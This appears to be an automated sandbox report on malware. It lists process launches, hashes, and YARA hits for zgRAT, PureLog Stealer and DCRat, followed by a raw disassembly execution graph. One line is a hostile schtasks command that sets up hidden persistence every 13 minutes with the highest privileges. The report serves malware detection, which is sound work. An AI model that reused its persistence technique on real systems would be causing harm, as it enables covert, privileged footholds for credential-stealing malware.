                                                                                                                      Commandline:schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:29
                                                                                                                      Start time:09:27:12
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\uMu0Nxwczl.bat"
                                                                                                                      Imagebase:0x7ff7d6740000
                                                                                                                      File size:289'792 bytes
                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:30
                                                                                                                      Start time:09:27:12
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:31
                                                                                                                      Start time:09:27:12
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Windows\System32\chcp.com
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:chcp 65001
                                                                                                                      Imagebase:0x7ff6fac10000
                                                                                                                      File size:14'848 bytes
                                                                                                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:32
                                                                                                                      Start time:09:27:12
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Windows\System32\w32tm.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                      Imagebase:0x7ff7682e0000
                                                                                                                      File size:108'032 bytes
                                                                                                                      MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:35
                                                                                                                      Start time:09:27:13
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Program Files (x86)\reference assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe"
                                                                                                                      Imagebase:0xa60000
                                                                                                                      File size:3'538'432 bytes
                                                                                                                      MD5 hash:26C2B88440A62B4CB79201E01A404BD2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe, Author: Joe Security
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 100%, Avira
                                                                                                                      • Detection: 100%, Avira
                                                                                                                      • Detection: 100%, Avira
                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                      • Detection: 63%, ReversingLabs
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:36
                                                                                                                      Start time:09:27:13
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Program Files (x86)\reference assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe"
                                                                                                                      Imagebase:0x8c0000
                                                                                                                      File size:3'538'432 bytes
                                                                                                                      MD5 hash:26C2B88440A62B4CB79201E01A404BD2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000024.00000002.2899943903.00000000034E3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000024.00000002.2899943903.0000000003277000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000024.00000002.2899943903.0000000003661000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      Has exited:false

                                                                                                                      General

                                                                                                                      Target ID:37
                                                                                                                      Start time:09:27:17
                                                                                                                      Start date:08/12/2024
                                                                                                                      Path:C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe"
                                                                                                                      Imagebase:0xdf0000
                                                                                                                      File size:3'538'432 bytes
                                                                                                                      MD5 hash:26C2B88440A62B4CB79201E01A404BD2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 63%, ReversingLabs
                                                                                                                      Has exited:true

                                                                                                                      Disassembly

                                                                                                                      Reset < >

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:9.6%
                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                        Signature Coverage:9.3%
                                                                                                                        Total number of Nodes:1512
                                                                                                                        Total number of Limit Nodes:42
                                                                                                                        execution_graph 23394 4ae44b 23395 4ae3f4 23394->23395 23397 4ae85d 23395->23397 23423 4ae5bb 23397->23423 23399 4ae86d 23400 4ae8ca 23399->23400 23409 4ae8ee 23399->23409 23401 4ae7fb DloadReleaseSectionWriteAccess 6 API calls 23400->23401 23402 4ae8d5 RaiseException 23401->23402 23416 4aeac3 23402->23416 23403 4ae9d9 23407 4aea95 23403->23407 23408 4aea37 GetProcAddress 23403->23408 23404 4ae966 LoadLibraryExA 23405 4ae979 GetLastError 23404->23405 23406 4ae9c7 23404->23406 23411 4ae9a2 23405->23411 23418 4ae98c 23405->23418 23406->23403 23410 4ae9d2 FreeLibrary 23406->23410 23432 4ae7fb 23407->23432 23408->23407 23413 4aea47 GetLastError 23408->23413 23409->23403 23409->23404 23409->23406 23409->23407 23410->23403 23412 4ae7fb DloadReleaseSectionWriteAccess 6 API calls 23411->23412 23414 4ae9ad RaiseException 23412->23414 23419 4aea5a 23413->23419 23414->23416 23416->23395 23417 4ae7fb DloadReleaseSectionWriteAccess 6 API calls 23420 4aea7b RaiseException 23417->23420 23418->23406 23418->23411 23419->23407 23419->23417 23421 4ae5bb ___delayLoadHelper2@8 6 API calls 23420->23421 23422 4aea92 23421->23422 23422->23407 23424 4ae5ed 23423->23424 23425 4ae5c7 23423->23425 23424->23399 23440 4ae664 23425->23440 23427 4ae5cc 23428 4ae5e8 23427->23428 23443 4ae78d 23427->23443 23448 4ae5ee GetModuleHandleW GetProcAddress GetProcAddress 23428->23448 23431 4ae836 23431->23399 23433 4ae82f 23432->23433 23434 4ae80d 23432->23434 23433->23416 23435 4ae664 DloadReleaseSectionWriteAccess 3 API calls 23434->23435 23436 4ae812 23435->23436 23437 4ae82a 23436->23437 23438 4ae78d DloadProtectSection 3 API calls 23436->23438 23451 4ae831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 23437->23451 23438->23437 23449 4ae5ee GetModuleHandleW GetProcAddress GetProcAddress 23440->23449 23442 4ae669 23442->23427 23445 4ae7a2 DloadProtectSection 23443->23445 23444 4ae7a8 23444->23428 23445->23444 23446 4ae7dd VirtualProtect 23445->23446 23450 4ae6a3 VirtualQuery GetSystemInfo 23445->23450 23446->23444 23448->23431 23449->23442 23450->23446 23451->23433 25336 4aa440 GdipCloneImage GdipAlloc 25398 4b3a40 5 API calls CatchGuardHandler 25414 4c1f40 CloseHandle 23588 4acd58 23590 4ace22 23588->23590 23593 4acd7b _wcschr 23588->23593 23604 4ac793 _wcslen _wcsrchr 23590->23604 23616 4ad78f 23590->23616 23592 4ad40a 23593->23590 23595 4a1fbb CompareStringW 23593->23595 23595->23593 23596 4aca67 SetWindowTextW 23596->23604 23601 4ac855 SetFileAttributesW 23603 4ac90f GetFileAttributesW 23601->23603 23614 4ac86f __cftof _wcslen 23601->23614 23603->23604 23605 4ac921 DeleteFileW 23603->23605 23604->23592 23604->23596 23604->23601 23607 4acc31 GetDlgItem SetWindowTextW SendMessageW 23604->23607 23610 4acc71 SendMessageW 23604->23610 23615 4a1fbb CompareStringW 23604->23615 23638 4ab314 23604->23638 23642 4aa64d GetCurrentDirectoryW 23604->23642 23644 49a5d1 6 API calls 23604->23644 23645 49a55a FindClose 23604->23645 23646 4ab48e 76 API calls 2 library calls 23604->23646 23647 4b3e3e 23604->23647 23605->23604 23608 4ac932 23605->23608 23607->23604 23609 494092 _swprintf 51 API calls 23608->23609 23611 4ac952 GetFileAttributesW 23609->23611 23610->23604 23611->23608 23612 4ac967 MoveFileW 23611->23612 23612->23604 23613 4ac97f MoveFileExW 23612->23613 23613->23604 23614->23603 23614->23604 23643 49b991 51 API calls 3 library calls 23614->23643 23615->23604 23618 4ad799 __cftof _wcslen 23616->23618 23617 4ad9e7 23617->23604 23618->23617 23619 4ad8a5 23618->23619 23620 4ad9c0 23618->23620 23663 4a1fbb CompareStringW 23618->23663 23660 49a231 23619->23660 23620->23617 23624 4ad9de ShowWindow 23620->23624 23624->23617 23626 4ad925 23665 4adc3b 6 API calls 23626->23665 23627 4ad97b CloseHandle 23628 4ad994 23627->23628 23629 4ad989 23627->23629 23628->23620 23666 4a1fbb CompareStringW 23629->23666 23630 4ad8d1 23630->23617 23630->23626 23630->23627 23632 4ad91b ShowWindow 23630->23632 23632->23626 23634 4ad93d 23634->23627 23635 4ad950 GetExitCodeProcess 23634->23635 23635->23627 23636 4ad963 23635->23636 23636->23627 23639 4ab31e 23638->23639 23640 4ab40d 23639->23640 23641 4ab3f0 ExpandEnvironmentStringsW 23639->23641 23640->23604 23641->23640 23642->23604 23643->23614 23644->23604 23645->23604 23646->23604 23648 4b8e54 23647->23648 23649 4b8e6c 23648->23649 23650 4b8e61 23648->23650 23652 4b8e74 23649->23652 23658 4b8e7d _unexpected 23649->23658 23681 4b8e06 23650->23681 23653 4b8dcc _free 20 API calls 23652->23653 23656 4b8e69 23653->23656 23654 4b8e82 23688 4b91a8 20 API calls _free 23654->23688 23655 4b8ea7 HeapReAlloc 23655->23656 23655->23658 23656->23604 23658->23654 23658->23655 23689 4b7a5e 7 API calls 2 library calls 23658->23689 23667 49a243 23660->23667 23663->23619 23664 49b6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 23664->23630 23665->23634 23666->23628 23675 4aec50 23667->23675 23670 49a23a 23670->23630 23670->23664 23671 49a261 23677 49bb03 23671->23677 23673 49a275 23673->23670 23674 49a279 GetFileAttributesW 23673->23674 23674->23670 23676 49a250 GetFileAttributesW 23675->23676 23676->23670 23676->23671 23678 49bb10 _wcslen 23677->23678 23679 49bbb8 GetCurrentDirectoryW 23678->23679 23680 49bb39 _wcslen 23678->23680 23679->23680 23680->23673 23682 4b8e44 23681->23682 23686 4b8e14 _unexpected 23681->23686 23691 4b91a8 20 API calls _free 23682->23691 23684 4b8e2f RtlAllocateHeap 23685 4b8e42 23684->23685 23684->23686 23685->23656 23686->23682 23686->23684 23690 4b7a5e 7 API calls 2 library calls 23686->23690 23688->23656 23689->23658 23690->23686 23691->23685 25338 4ae455 14 API calls ___delayLoadHelper2@8 25339 4ac793 107 API calls 5 library calls 25400 4b8268 55 API calls _free 25415 4b7f6e 52 API calls 2 library calls 24627 499f7a 24628 499f88 24627->24628 24629 499f8f 24627->24629 24630 499f9c GetStdHandle 24629->24630 24637 499fab 24629->24637 24630->24637 24631 49a003 WriteFile 24631->24637 24632 499fcf 24633 499fd4 WriteFile 24632->24633 24632->24637 24633->24632 24633->24637 24635 49a095 24639 496e98 77 API calls 24635->24639 24637->24628 24637->24631 24637->24632 24637->24633 24637->24635 24638 496baa 78 API calls 24637->24638 24638->24637 24639->24628 25341 4aa070 10 API calls 25401 4ab270 99 API calls 25417 491f72 128 API calls __EH_prolog 25343 491075 84 API calls 24688 499a74 24692 499a7e 24688->24692 24689 499ab1 24690 499b9d SetFilePointer 24690->24689 24691 499bb6 GetLastError 24690->24691 24691->24689 24692->24689 24692->24690 24693 49981a 79 API calls 24692->24693 24694 499b79 24692->24694 24693->24694 24694->24690 25344 4aa400 GdipDisposeImage GdipFree 25402 4ad600 70 API calls 25345 4b6000 QueryPerformanceFrequency QueryPerformanceCounter 25378 4b2900 6 API calls 4 library calls 25403 4bf200 51 API calls 25418 4ba700 21 API calls 25420 491710 86 API calls 25380 4aad10 73 API calls 25382 4bb4ae 27 API calls CatchGuardHandler 25350 4bf421 21 API calls __vswprintf_c_l 25404 4ac220 93 API calls _swprintf 25352 491025 29 API calls 25383 4af530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25423 4aff30 LocalFree 25212 4bbb30 25213 4bbb42 25212->25213 25214 4bbb39 25212->25214 25216 4bba27 25214->25216 25217 4b97e5 _unexpected 38 API calls 25216->25217 25218 4bba34 25217->25218 25236 4bbb4e 25218->25236 25220 4bba3c 25245 4bb7bb 25220->25245 25223 4bba53 25223->25213 25224 4b8e06 __vswprintf_c_l 21 API calls 25225 4bba64 25224->25225 25226 4bba96 25225->25226 25252 4bbbf0 25225->25252 25229 4b8dcc _free 20 API calls 25226->25229 25229->25223 25230 4bba91 25262 4b91a8 20 API calls _free 25230->25262 25232 4bbada 25232->25226 25263 4bb691 26 API calls 25232->25263 25233 4bbaae 25233->25232 25234 4b8dcc _free 20 API calls 25233->25234 25234->25232 25237 4bbb5a __FrameHandler3::FrameUnwindToState 25236->25237 25238 4b97e5 _unexpected 38 API calls 25237->25238 25243 4bbb64 25238->25243 25240 4bbbe8 _abort 25240->25220 25243->25240 25244 4b8dcc _free 20 API calls 25243->25244 25264 4b8d24 38 API calls _abort 25243->25264 25265 4bac31 EnterCriticalSection 25243->25265 25266 4bbbdf LeaveCriticalSection _abort 25243->25266 25244->25243 25246 4b4636 __cftof 38 API calls 25245->25246 25247 4bb7cd 25246->25247 25248 4bb7ee 25247->25248 25249 4bb7dc GetOEMCP 25247->25249 25250 4bb805 25248->25250 25251 4bb7f3 GetACP 25248->25251 25249->25250 25250->25223 25250->25224 25251->25250 25253 4bb7bb 40 API calls 25252->25253 25254 4bbc0f 25253->25254 25257 4bbc60 IsValidCodePage 25254->25257 25259 4bbc16 25254->25259 25261 4bbc85 __cftof 25254->25261 25255 4afbbc CatchGuardHandler 5 API calls 25256 4bba89 25255->25256 25256->25230 25256->25233 25258 4bbc72 GetCPInfo 25257->25258 25257->25259 25258->25259 25258->25261 25259->25255 25267 4bb893 GetCPInfo 25261->25267 25262->25226 25263->25226 25265->25243 25266->25243 25268 4bb977 25267->25268 25274 4bb8cd 25267->25274 25271 4afbbc CatchGuardHandler 5 API calls 25268->25271 25273 4bba23 25271->25273 25273->25259 25277 4bc988 25274->25277 25276 4bab78 __vswprintf_c_l 43 API calls 25276->25268 25278 4b4636 __cftof 38 API calls 25277->25278 25279 4bc9a8 MultiByteToWideChar 25278->25279 25281 4bc9e6 25279->25281 25288 4bca7e 25279->25288 25285 4b8e06 __vswprintf_c_l 21 API calls 25281->25285 25289 4bca07 __cftof __vsnwprintf_l 25281->25289 25282 4afbbc CatchGuardHandler 5 API calls 25283 4bb92e 25282->25283 25291 4bab78 25283->25291 25284 4bca78 25296 4babc3 20 API calls _free 25284->25296 25285->25289 25287 4bca4c MultiByteToWideChar 25287->25284 25290 4bca68 GetStringTypeW 25287->25290 25288->25282 25289->25284 25289->25287 25290->25284 25292 4b4636 __cftof 38 API calls 25291->25292 25293 4bab8b 25292->25293 25297 4ba95b 25293->25297 25296->25288 25298 4ba976 __vswprintf_c_l 25297->25298 25299 4ba99c MultiByteToWideChar 25298->25299 25300 4bab50 25299->25300 25301 4ba9c6 25299->25301 25302 4afbbc CatchGuardHandler 5 API calls 25300->25302 25305 4b8e06 __vswprintf_c_l 21 API calls 25301->25305 25307 4ba9e7 __vsnwprintf_l 25301->25307 25303 4bab63 25302->25303 25303->25276 25304 4baa30 MultiByteToWideChar 25306 4baa49 25304->25306 25319 4baa9c 25304->25319 25305->25307 25324 4baf6c 25306->25324 25307->25304 25307->25319 25311 4baa73 25314 4baf6c __vswprintf_c_l 11 API calls 25311->25314 25311->25319 25312 4baaab 25313 4b8e06 __vswprintf_c_l 21 API calls 25312->25313 25317 4baacc __vsnwprintf_l 25312->25317 25313->25317 25314->25319 25315 4bab41 25332 4babc3 20 API calls _free 25315->25332 25317->25315 25318 4baf6c __vswprintf_c_l 11 API calls 25317->25318 25320 4bab20 25318->25320 25333 4babc3 20 API calls _free 25319->25333 25320->25315 25321 4bab2f WideCharToMultiByte 25320->25321 25321->25315 25322 4bab6f 25321->25322 25334 4babc3 20 API calls _free 25322->25334 25325 4bac98 _unexpected 5 API calls 25324->25325 25326 4baf93 25325->25326 25330 4baf9c 25326->25330 25335 4baff4 10 API calls 3 library calls 25326->25335 25328 4bafdc LCMapStringW 25328->25330 25329 4afbbc CatchGuardHandler 5 API calls 25331 4baa60 25329->25331 25330->25329 25331->25311 25331->25312 25331->25319 25332->25319 25333->25300 25334->25319 25335->25328 25354 4bc030 GetProcessHeap 25405 4a62ca 123 API calls __InternalCxxFrameHandler 23453 4adec2 23454 4adecf 23453->23454 23461 49e617 23454->23461 23462 49e627 23461->23462 23473 49e648 23462->23473 23465 494092 23496 494065 23465->23496 23468 4ab568 PeekMessageW 23469 4ab5bc 23468->23469 23470 4ab583 GetMessageW 23468->23470 23471 4ab5a8 TranslateMessage DispatchMessageW 23470->23471 23472 4ab599 IsDialogMessageW 23470->23472 23471->23469 23472->23469 23472->23471 23479 49d9b0 23473->23479 23476 49e66b LoadStringW 23477 49e645 23476->23477 23478 49e682 LoadStringW 23476->23478 23477->23465 23478->23477 23484 49d8ec 23479->23484 23481 49d9cd 23482 49d9e2 23481->23482 23492 49d9f0 26 API calls 23481->23492 23482->23476 23482->23477 23485 49d904 23484->23485 23491 49d984 _strncpy 23484->23491 23487 49d928 23485->23487 23493 4a1da7 WideCharToMultiByte 23485->23493 23490 49d959 23487->23490 23494 49e5b1 50 API calls __vsnprintf 23487->23494 23495 4b6159 26 API calls 3 library calls 23490->23495 23491->23481 23492->23482 23493->23487 23494->23490 23495->23491 23497 49407c __vswprintf_c_l 23496->23497 23500 4b5fd4 23497->23500 23503 4b4097 23500->23503 23504 4b40bf 23503->23504 23505 4b40d7 23503->23505 23527 4b91a8 20 API calls _free 23504->23527 23505->23504 23507 4b40df 23505->23507 23529 4b4636 23507->23529 23508 4b40c4 23528 4b9087 26 API calls ___std_exception_copy 23508->23528 23512 4b40cf 23520 4afbbc 23512->23520 23515 4b4167 23538 4b49e6 51 API calls 4 library calls 23515->23538 23516 494086 SetDlgItemTextW 23516->23468 23519 4b4172 23539 4b46b9 20 API calls _free 23519->23539 23521 4afbc4 23520->23521 23522 4afbc5 IsProcessorFeaturePresent 23520->23522 23521->23516 23524 4afc07 23522->23524 23540 4afbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23524->23540 23526 4afcea 23526->23516 23527->23508 23528->23512 23530 4b4653 23529->23530 23536 4b40ef 23529->23536 23530->23536 23541 4b97e5 GetLastError 23530->23541 23532 4b4674 23561 4b993a 38 API calls __cftof 23532->23561 23534 4b468d 23562 4b9967 38 API calls __cftof 23534->23562 23537 4b4601 20 API calls 2 library calls 23536->23537 23537->23515 23538->23519 23539->23512 23540->23526 23542 4b97fb 23541->23542 23543 4b9801 23541->23543 23563 4bae5b 11 API calls 2 library calls 23542->23563 23547 4b9850 SetLastError 23543->23547 23564 4bb136 23543->23564 23547->23532 23548 4b981b 23571 4b8dcc 23548->23571 23550 4b9830 23550->23548 23552 4b9837 23550->23552 23578 4b9649 20 API calls _unexpected 23552->23578 23553 4b9821 23555 4b985c SetLastError 23553->23555 23579 4b8d24 38 API calls _abort 23555->23579 23556 4b9842 23558 4b8dcc _free 20 API calls 23556->23558 23560 4b9849 23558->23560 23560->23547 23560->23555 23561->23534 23562->23536 23563->23543 23569 4bb143 _unexpected 23564->23569 23565 4bb183 23581 4b91a8 20 API calls _free 23565->23581 23566 4bb16e RtlAllocateHeap 23567 4b9813 23566->23567 23566->23569 23567->23548 23577 4baeb1 11 API calls 2 library calls 23567->23577 23569->23565 23569->23566 23580 4b7a5e 7 API calls 2 library calls 23569->23580 23572 4b8dd7 RtlFreeHeap 23571->23572 23573 4b8e00 _free 23571->23573 23572->23573 23574 4b8dec 23572->23574 23573->23553 23582 4b91a8 20 API calls _free 23574->23582 23576 4b8df2 GetLastError 23576->23573 23577->23550 23578->23556 23580->23569 23581->23567 23582->23576 25384 4ab5c0 100 API calls 25425 4a77c0 118 API calls 25426 4affc0 RaiseException _com_error::_com_error CallUnexpected 25407 4b0ada 51 API calls 2 library calls 25356 4af4d3 20 API calls 23695 4ae1d1 14 API calls ___delayLoadHelper2@8 25427 4ba3d0 21 API calls 2 library calls 23696 4910d5 23701 495abd 23696->23701 23702 495ac7 __EH_prolog 23701->23702 23708 49b505 23702->23708 23704 495ad3 23714 495cac GetCurrentProcess GetProcessAffinityMask 23704->23714 23709 49b50f __EH_prolog 23708->23709 23715 49f1d0 82 API calls 23709->23715 23711 49b521 23716 49b61e 23711->23716 23715->23711 23717 49b630 __cftof 23716->23717 23720 4a10dc 23717->23720 23723 4a109e GetCurrentProcess GetProcessAffinityMask 23720->23723 23724 49b597 23723->23724 23724->23704 25428 4c2bd0 VariantClear 23725 4ae2d7 23726 4ae1db 23725->23726 23727 4ae85d ___delayLoadHelper2@8 14 API calls 23726->23727 23727->23726 25386 49f1e8 FreeLibrary 23735 4913e1 84 API calls 2 library calls 23736 4ab7e0 23737 4ab7ea __EH_prolog 23736->23737 23902 491316 23737->23902 23740 4ab841 23741 4ab82a 23741->23740 23744 4ab89b 23741->23744 23745 4ab838 23741->23745 23742 4abf0f 23974 4ad69e 23742->23974 23749 4ab92e GetDlgItemTextW 23744->23749 23755 4ab8b1 23744->23755 23750 4ab878 23745->23750 23751 4ab83c 23745->23751 23747 4abf2a SendMessageW 23748 4abf38 23747->23748 23752 4abf52 GetDlgItem SendMessageW 23748->23752 23753 4abf41 SendDlgItemMessageW 23748->23753 23749->23750 23754 4ab96b 23749->23754 23750->23740 23757 4ab95f KiUserCallbackDispatcher 23750->23757 23751->23740 23760 49e617 53 API calls 23751->23760 23992 4aa64d GetCurrentDirectoryW 23752->23992 23753->23752 23758 4ab980 GetDlgItem 23754->23758 23900 4ab974 23754->23900 23759 49e617 53 API calls 23755->23759 23757->23740 23763 4ab9b7 SetFocus 23758->23763 23764 4ab994 SendMessageW SendMessageW 23758->23764 23765 4ab8ce SetDlgItemTextW 23759->23765 23761 4ab85b 23760->23761 24014 49124f SHGetMalloc 23761->24014 23762 4abf82 GetDlgItem 23767 4abf9f 23762->23767 23768 4abfa5 SetWindowTextW 23762->23768 23769 4ab9c7 23763->23769 23780 4ab9e0 23763->23780 23764->23763 23770 4ab8d9 23765->23770 23767->23768 23993 4aabab GetClassNameW 23768->23993 23774 49e617 53 API calls 23769->23774 23770->23740 23777 4ab8e6 GetMessageW 23770->23777 23771 4ab862 23771->23740 23779 4ac1fc SetDlgItemTextW 23771->23779 23772 4abe55 23775 49e617 53 API calls 23772->23775 23778 4ab9d1 23774->23778 23781 4abe65 SetDlgItemTextW 23775->23781 23777->23740 23783 4ab8fd IsDialogMessageW 23777->23783 24015 4ad4d4 23778->24015 23779->23740 23789 49e617 53 API calls 23780->23789 23786 4abe79 23781->23786 23783->23770 23788 4ab90c TranslateMessage DispatchMessageW 23783->23788 23785 4ab9d9 23912 49a0b1 23785->23912 23791 49e617 53 API calls 23786->23791 23788->23770 23790 4aba17 23789->23790 23794 494092 _swprintf 51 API calls 23790->23794 23822 4abe9c _wcslen 23791->23822 23792 4abff0 23793 4ac020 23792->23793 23798 49e617 53 API calls 23792->23798 23803 4ac73f 97 API calls 23793->23803 23855 4ac0d8 23793->23855 23799 4aba29 23794->23799 23796 4ac73f 97 API calls 23796->23792 23802 4ac003 SetDlgItemTextW 23798->23802 23804 4ad4d4 16 API calls 23799->23804 23800 4aba73 23918 4aac04 SetCurrentDirectoryW 23800->23918 23801 4aba68 GetLastError 23801->23800 23807 49e617 53 API calls 23802->23807 23809 4ac03b 23803->23809 23804->23785 23805 4ac18b 23810 4ac19d 23805->23810 23811 4ac194 EnableWindow 23805->23811 23806 4abeed 23815 49e617 53 API calls 23806->23815 23813 4ac017 SetDlgItemTextW 23807->23813 23821 4ac04d 23809->23821 23846 4ac072 23809->23846 23812 4ac1ba 23810->23812 24033 4912d3 GetDlgItem EnableWindow 23810->24033 23811->23810 23818 4ac1e1 23812->23818 23832 4ac1d9 SendMessageW 23812->23832 23813->23793 23814 4aba87 23819 4aba90 GetLastError 23814->23819 23820 4aba9e 23814->23820 23815->23740 23816 4ac0cb 23824 4ac73f 97 API calls 23816->23824 23818->23740 23834 49e617 53 API calls 23818->23834 23819->23820 23825 4abb11 23820->23825 23828 4abb20 23820->23828 23833 4abaae GetTickCount 23820->23833 24031 4a9ed5 32 API calls 23821->24031 23822->23806 23827 49e617 53 API calls 23822->23827 23823 4ac1b0 24034 4912d3 GetDlgItem EnableWindow 23823->24034 23824->23855 23825->23828 23829 4abd56 23825->23829 23835 4abed0 23827->23835 23836 4abcfb 23828->23836 23837 4abb39 GetModuleFileNameW 23828->23837 23838 4abcf1 23828->23838 23934 4912f1 GetDlgItem ShowWindow 23829->23934 23830 4ac066 23830->23846 23832->23818 23841 494092 _swprintf 51 API calls 23833->23841 23834->23771 23842 494092 _swprintf 51 API calls 23835->23842 23845 49e617 53 API calls 23836->23845 24025 49f28c 82 API calls 23837->24025 23838->23750 23838->23836 23839 4ac169 24032 4a9ed5 32 API calls 23839->24032 23848 4abac7 23841->23848 23842->23806 23852 4abd05 23845->23852 23846->23816 23853 4ac73f 97 API calls 23846->23853 23847 4abd66 23935 4912f1 GetDlgItem ShowWindow 23847->23935 23919 49966e 23848->23919 23849 49e617 53 API calls 23849->23855 23850 4abb5f 23856 494092 _swprintf 51 API calls 23850->23856 23851 4ac188 23851->23805 23857 494092 _swprintf 51 API calls 23852->23857 23858 4ac0a0 23853->23858 23855->23805 23855->23839 23855->23849 23861 4abb81 CreateFileMappingW 23856->23861 23862 4abd23 23857->23862 23858->23816 23863 4ac0a9 DialogBoxParamW 23858->23863 23859 4abd70 23864 49e617 53 API calls 23859->23864 23867 4abbe3 GetCommandLineW 23861->23867 23895 4abc60 __InternalCxxFrameHandler 23861->23895 23875 49e617 53 API calls 23862->23875 23863->23750 23863->23816 23865 4abd7a SetDlgItemTextW 23864->23865 23936 4912f1 GetDlgItem ShowWindow 23865->23936 23866 4abaed 23869 4abaff 23866->23869 23870 4abaf4 GetLastError 23866->23870 23871 4abbf4 23867->23871 23927 49959a 23869->23927 23870->23869 24026 4ab425 SHGetMalloc 23871->24026 23872 4abd8c SetDlgItemTextW GetDlgItem 23876 4abda9 GetWindowLongW SetWindowLongW 23872->23876 23877 4abdc1 23872->23877 23879 4abd3d 23875->23879 23876->23877 23937 4ac73f 23877->23937 23878 4abc10 24027 4ab425 SHGetMalloc 23878->24027 23883 4abc1c 24028 4ab425 SHGetMalloc 23883->24028 23884 4ac73f 97 API calls 23886 4abddd 23884->23886 23962 4ada52 23886->23962 23887 4abc28 24029 49f3fa 82 API calls 2 library calls 23887->24029 23888 4abccb 23888->23838 23894 4abce1 UnmapViewOfFile CloseHandle 23888->23894 23892 4abc3f MapViewOfFile 23892->23895 23893 4ac73f 97 API calls 23899 4abe03 23893->23899 23894->23838 23895->23888 23896 4abcb7 Sleep 23895->23896 23896->23888 23896->23895 23897 4abe2c 24030 4912d3 GetDlgItem EnableWindow 23897->24030 23899->23897 23901 4ac73f 97 API calls 23899->23901 23900->23750 